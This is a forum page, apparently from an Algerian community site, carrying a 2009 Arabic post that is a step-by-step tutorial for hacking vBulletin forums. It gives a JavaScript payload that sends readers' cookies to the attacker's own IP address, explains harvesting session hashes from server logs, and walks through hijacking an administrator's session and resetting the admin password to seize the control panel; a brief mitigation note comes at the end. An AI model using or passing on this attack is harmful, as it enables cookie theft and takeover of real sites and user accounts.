* Bienvenue sur le site de SIDI-IDIR*/ مرحبا بكم
bienvenu cher(e) visiteur
ansuf yessek a yinebgui
مرحبا بك عزيزي الزائر
clock islamic
Rechercher
 
 

Résultats par :
 


Rechercher Recherche avancée

Derniers sujets
» Ath ourtilane - azrew iflane 27 Mai 2015
Lun 22 Mai 2017 - 17:15 par AMAZIGH

» Ce que l’Islam peut apporter à la science moderne
Jeu 24 Mar 2016 - 22:54 par AMAZIGH

» La Naissance de l'Islam (Arte - Le Coran, aux Origines du Livre)
Jeu 24 Mar 2016 - 22:48 par AMAZIGH

» video drole de chute wallah tu va essaye de ne pas rire
Jeu 24 Mar 2016 - 22:22 par AMAZIGH

» elhadra a tawrirt
Jeu 24 Mar 2016 - 22:16 par AMAZIGH

» Jeunesse D'El Main a Tizi, ilamzayen n y Ilmayen g Tizi
Jeu 24 Mar 2016 - 22:04 par AMAZIGH

» El Main Sur Echourouk TV
Jeu 24 Mar 2016 - 22:00 par AMAZIGH

» video sidi idir Mai 2015
Jeu 24 Mar 2016 - 21:54 par AMAZIGH

» MATOUB LOUNES INEDIT(privé)1994
Jeu 24 Mar 2016 - 21:51 par AMAZIGH

Navigation
 Portail
 Index
 Membres
 Profil
 FAQ
 Rechercher
Partenaires
Forum gratuit



Tchat Blablaland


Juillet 2017
DimLunMarMerJeuVenSam
      1
2345678
9101112131415
16171819202122
23242526272829
3031     

Calendrier Calendrier

infos bgayet
iphone
KABYLIE news
infos Algerie
EL-WATAN
compteur

tadmire.vb.vb

Voir le sujet précédent Voir le sujet suivant Aller en bas

tadmire.vb.vb

Message par tadmire. le Mer 21 Jan 2009 - 0:28

الموضوع : اختراق ـ
المتطلبات : WebServer (تركيب سيرفر على جهازك الشخصي) + متصفح انترنت (اكسبلورر) .
المستوى : متوسط

ملاحظة : هذه الطريقة لست للـ vBulletin فقط !! يمكن ان تجربها على انواع اخرى من المنتديات .

الثغرة :

تنقسم طريقة العمل الى عدة اقسام .. أولا بعض السكربتات الخبيثة التي تسرق الكوكيز بالاضافة الى جعل المنتدى يستقبل
بيانات من مكان خاطيء .. لكن يشترط ان يسمح المنتدى بأكواد الـ HTML ..

قم بكتابة موضوع جديد او رد (في منتدى يدعم الـ HTML ) .. ثم اكتب اي موضوع والصق بين السطور هذا الكود :
document.write('src="http://my_ip_address/'+document·cookie+'">';

مع ملاحظة تغير الـ IP Adress الى رقم الـ IP الخاص بك .

وعندما يقوم شخص ما بقراءة محتوى الصفحة فان السكربت الذي قمنا بوضعه سيقوم بتنفيذ الاوامر في جهاز وقراءة جزء
من احد ملفات الكوكيز التي تحتوي على الباسورد الخاصة بالمنتدى .. ثم يقوم السكربت بتحويل هذه السطور الى رقم
الاي بي الذي قمنا بكتابته سابقا (مع ملاحظة انه يجب ان يكون على جهازي سيرفر مثل IIS او Apache او غيرها ) .

وبعد ان تتم العملية بنجاح قم بفتح ملف الـ Log الخاص بالسيرفر الذي يحتويه جهازك ..
مثال لو كان السيرفر اباتشي .. فتاح المجلد Apche واختر logs واختر Acces Log .
ستجد جميع الاوامر التي طلبتها من السيرفر .. إلخ

ابحث عن الكود الخاص بالباسورد .. مثال :

GET/ bbuserid=86;%20bbpassword=dd6169d68822a116cd97e1fb

ddf90622;%20sessionhash=a
4719cd620534914930b86839c4bb5f8;%20bbthreadview[54

20]=1012444064;%20bblastvi
sit=1011983161

فكر قليلا الان .. اين الباسورد ؟؟
الباسورد موجودة لكن بطريقة مشفرة يصعب كسرها .. اذن مالحل ؟
قم بنسخ الكود الذي وجدته والصقه في المتصفح .. بهذا الشكل hash]
ستجد عبارة : " أهلا بعودتك يـا ( اسم الذي سرقت منه الكوكيز....) "
في هذه الحالة انت الان تستطيع التحكم بكل شي وكانك مدير المنتدى (الذي سرقت منه الكوكيز) ..
لكننا نحتاج الى كلمة المرور للدخول الى لوحة التحكم .. اذهب الى (التحكم) وقم بتعديل البريد الالكتروني الى بريدك الخاص
وثم قم بتسجيل الخروج .. ثم اذهب الى اداة Forgot Password .. وعندها تستطيع استقبال بريد يحتوي باسورد الادمن ..

اعتقد انك تعلم ما يجب ان تفعله بعد ذلك !! ادخل الى لوحة التحكم وافعل ما تشاء .. !

الحل

للحماية من هذه الثغرة قم باغلاق الـ HTML في (المنتدى + الرسائل الخاصة + التواقيع + التقويم + ... )
(واي منفذ يمكن من خلاله وضع كود HTML باي صورة كانت )

كما يجب اغلا كود الـ IMG .. لانه ببساطة بامكانك استخدامه بدل كلمة فاذا وضعت او او
اي كلمة اخرى فانه سيتم تنفيذ السكربت بشكل او باخر ... لذا كن حذرا واغلق هذه المنافذ .
Be Secret .. Dont' be Lamer .

تاريخ اكتشاف الثغرة : 31 - 1 - 2002
تم تجربتها على الاصدار 2.2.0 وهي تعمل بنجاح .

tadmire.
Invité


Revenir en haut Aller en bas

Voir le sujet précédent Voir le sujet suivant Revenir en haut


 
Permission de ce forum:
Vous ne pouvez pas répondre aux sujets dans ce forum